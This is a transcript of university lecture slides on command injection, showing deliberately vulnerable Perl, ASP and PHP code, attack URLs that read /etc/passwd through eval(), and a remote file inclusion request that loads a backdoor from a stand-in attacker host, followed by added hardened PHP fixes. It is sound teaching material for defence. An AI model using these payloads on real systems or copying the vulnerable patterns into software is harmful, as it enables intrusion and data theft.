Post on 16-Dec-2015
transcript
Outline
Today we will have Adam presenting how to attack authentication (Ch6)
Before his presentation, I will continue Command Injection (Ch9), and I will also present my recent research on how to prevent and remove injection vulnerabilities
The rest of your presentations have been scheduled. Please check the course web page and plan ahead. Let me know if you have any questions.
The course website : http://soslab.nccu.edu.tw/Courses.html
Interpreted Languages
Recall that an interpreted language is one whose execution involves a runtime component that interprets the code of the language and carries out the instructions it contains
For example, SQL, Perl, ASP, PHP, etc.
Interpreted Languages
In most applications, the code processed by the interpreter is a mix of instructions written by a programmer and data supplied by a user.
An attacker can supply crafted input that breaks out of the data context, usually by supplying some syntax that has a special significance within the grammar of the interpreted language.
Command Injection Attacks
Main problem: incorrect or completely absent validation of user input, which results in the execution of attacker-chosen commands on the server
We discussed SQL injection last week. Today we will discuss OS command, web scripting language, SOAP and SMTP injection attacks.
OS command: Injecting via Perl
Consider a Perl CGI script that allows administrators to specify a directory and view a summary of its disk usage
#!/usr/bin/perl
use strict;
use CGI qw(:standard escapeHTML);
print header, start_html("");
print "<pre>";
# Base command: disk usage of the web root, excluding php* entries
my $command = "du -h --exclude php* /var/www/html";
# The user-supplied "dir" parameter is appended to the command string without any validation
$command = $command . param("dir");
# Backticks hand the whole string to the shell, so shell metacharacters in "dir" are honoured
$command = `$command`;
print "$command\n";
print end_html;
Injecting via Perl
The pipe character "|" redirects the output of one process to the input of another process
This allows multiple commands to be chained together in a single command line
OS Command: Injecting via ASP
Consider an ASP page that allows administrators to view the contents of a requested log file
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' "type" prints the log file; FileName is taken straight from the form, unvalidated
szCMD = "type c:\inetpub\wwwroot\logs\" & Request.Form("FileName")
szTempFile = "C:\" & oFileSys.GetTempName()
' cmd.exe executes the assembled command line and writes its output to the temp file
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>
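Both scripts above have the same defect: a request parameter is concatenated into a command line that a shell then parses. The following is an added example, not code from the course or from the book the slides follow, showing the disk-usage feature rewritten in PHP with an allowlist on the parameter, a containment check on the resolved path, and escapeshellarg() on the argument that still reaches the shell. It assumes a web root of /var/www/html and keeps the parameter name "dir" from the Perl script.

```php
<?php
// Added example (not the page's or the book's code): a hardened PHP rendering of
// the disk-usage script. Assumed: web root /var/www/html, parameter name "dir".
declare(strict_types=1);

const BASE_DIR = '/var/www/html';

/**
 * Return the canonical path for $dir if it names a directory inside BASE_DIR,
 * or null otherwise. realpath() resolves "..", symlinks and trailing slashes,
 * so the containment check is made on the resolved path, not on the raw input.
 */
function resolve_dir(string $dir): ?string
{
    // Allowlist: letters, digits, '_', '-', '.', and '/' only. This alone
    // rejects every shell metacharacter (| ; & ` $ and friends).
    if ($dir === '' || !preg_match('~\A[A-Za-z0-9_./-]+\z~', $dir)) {
        return null;
    }
    $base = realpath(BASE_DIR);
    $full = realpath(BASE_DIR . '/' . ltrim($dir, '/'));
    if ($base === false || $full === false || !is_dir($full)) {
        return null;
    }
    // Containment: $full must be $base itself or a path below it.
    if ($full !== $base && strpos($full, $base . '/') !== 0) {
        return null;
    }
    return $full;
}

/**
 * Build the command line. Even after validation the directory is quoted with
 * escapeshellarg(), so it always reaches du as exactly one argument.
 */
function disk_usage_command(string $resolvedDir): string
{
    return 'du -h --exclude ' . escapeshellarg('php*') . ' ' . escapeshellarg($resolvedDir);
}

header('Content-Type: text/html; charset=utf-8');
$dir = resolve_dir((string)($_GET['dir'] ?? ''));
if ($dir === null) {
    http_response_code(400);
    echo '<pre>invalid directory</pre>';
    exit;
}
$output = shell_exec(disk_usage_command($dir));
// du prints file names, which are attacker-influenced data, so escape for HTML.
echo '<pre>' . htmlspecialchars((string)$output, ENT_QUOTES, 'UTF-8') . "</pre>\n";
```

The same two ideas apply to the ASP version: reject any FileName that is not a plain file name from a known set, and never let the request value become part of a cmd.exe command line. Validation before the shell is what removes the vulnerability; escaping alone only narrows it.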
Dynamic Execution Vulnerabilities
The PHP function eval() is used to dynamically execute code that is passed to the function at runtime
Consider a search function that enables users to create stored searches. A request looks like:
https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh
The server-side implementation creates a mysearch variable with the value wahh:
$storedsearch = $_GET['storedsearch'];
eval("$storedsearch;");
Dynamic execution in PHP
The semicolon character can be used to batch commands together in a single parameter.
For example, to retrieve the contents of the file /etc/passwd, you could use either file_get_contents or the system command:
https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh;%20echo%20file_get_contents('/etc/passwd')
https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh;%20system('cat%20/etc/passwd')
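The root cause here is that user data is handed to the PHP interpreter as code. The fix is to stop using eval() and instead parse the one format the feature actually needs. The following is an added example, not the course's or the book's code, that accepts a stored-search definition of the form $name=value (the decoded form of the request above) with a small regular-expression grammar; anything outside that grammar, including the ';' that the payloads above rely on, is rejected. The parameter name storedsearch is kept from the page; where the accepted definitions are persisted is left out.

```php
<?php
// Added example (not the page's or the book's code): the stored-search feature
// without eval(). Assumed input form: "$name=value" or "name=value".
declare(strict_types=1);

/**
 * Parse one stored-search definition into ['name' => ..., 'value' => ...].
 * Returns null for anything that does not match the grammar.
 *
 * The grammar is deliberately tiny: an identifier, '=', and a value made of
 * letters, digits, spaces and a few punctuation characters. ';', '(', ')' and
 * quotes are not in it, so "...;system('cat /etc/passwd')" never reaches an
 * interpreter; it is simply refused.
 */
function parse_stored_search(string $raw): ?array
{
    if (!preg_match('~\A\$?([A-Za-z_][A-Za-z0-9_]{0,31})=([A-Za-z0-9 _.-]{1,64})\z~', $raw, $m)) {
        return null;
    }
    return ['name' => $m[1], 'value' => $m[2]];
}

/**
 * Record a parsed search in $stored (an in-memory array here; saving it to a
 * session or database is outside this example). Returns false if rejected.
 */
function store_search(array &$stored, string $raw): bool
{
    $parsed = parse_stored_search($raw);
    if ($parsed === null) {
        return false;
    }
    $stored[$parsed['name']] = $parsed['value'];
    return true;
}

// Request handling with the page's parameter name.
$stored = [];
$raw = (string)($_GET['storedsearch'] ?? '');
if (!store_search($stored, $raw)) {
    http_response_code(400);
    echo 'invalid stored search';
    exit;
}
// Echo the accepted definition back, HTML-escaped because it is user data.
echo 'stored ' . htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
```

With this in place, $mysearch=wahh is accepted and stored as name "mysearch" with value "wahh", while both payload URLs on the slide produce a 400 response. The design point is that data which only needs to be stored and later matched never needs to be executable.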
File Inclusion Attacks
Consider an application that delivers different content to people in different locations
A request looks like:
https://wahh-app.com/main.php?Country=US
The application processes it as follows:
$country = $_GET['Country'];
include($country . '.php');
File Inclusion Attacks
If an attacker intercepts and modifies the request to:
https://wahh-app.com/main.php?Country=http://wahh-attacker.com/backdoor
the server side includes an arbitrary remote file, because the include now resolves to:
include('http://wahh-attacker.com/backdoor' . '.php');
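The fix for this class of bug is to never build an include path from request data at all. The following is an added example, not the course's or the book's code, in which the Country parameter is only ever used as a key into a fixed map of pages; the request value itself never becomes part of a path. The country codes other than US, and the pages/ directory, are assumptions for the illustration.

```php
<?php
// Added example (not the page's or the book's code): the Country switch done
// with an allowlist instead of include($country . '.php').
declare(strict_types=1);

// Every page the feature can serve, keyed by the only Country values accepted.
// Assumed values; the page itself only shows "US".
const COUNTRY_PAGES = [
    'US' => 'US.php',
    'UK' => 'UK.php',
    'TW' => 'TW.php',
];

/**
 * Return the absolute path of the page for $country, or null if $country is
 * not in the allowlist. The request value is compared against keys only and
 * is never concatenated into a file name or URL.
 */
function resolve_country_page(string $country, string $pagesDir): ?string
{
    if (!array_key_exists($country, COUNTRY_PAGES)) {
        return null;
    }
    return $pagesDir . '/' . COUNTRY_PAGES[$country];
}

$page = resolve_country_page((string)($_GET['Country'] ?? ''), __DIR__ . '/pages');
if ($page === null || !is_file($page)) {
    http_response_code(404);
    echo 'unknown country';
    exit;
}
include $page;
```

As defence in depth, keep allow_url_include=Off in php.ini (the default in current PHP), which makes include() refuse http:// targets outright, and keep allow_url_fopen=Off unless the application genuinely needs remote streams. These settings limit the damage from a missed validation; they are not a substitute for it.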
Quiz
What’s the main cause of injection vulnerabilities?
How to prevent injection vulnerabilities?
Let’s talk a little bit about Stranger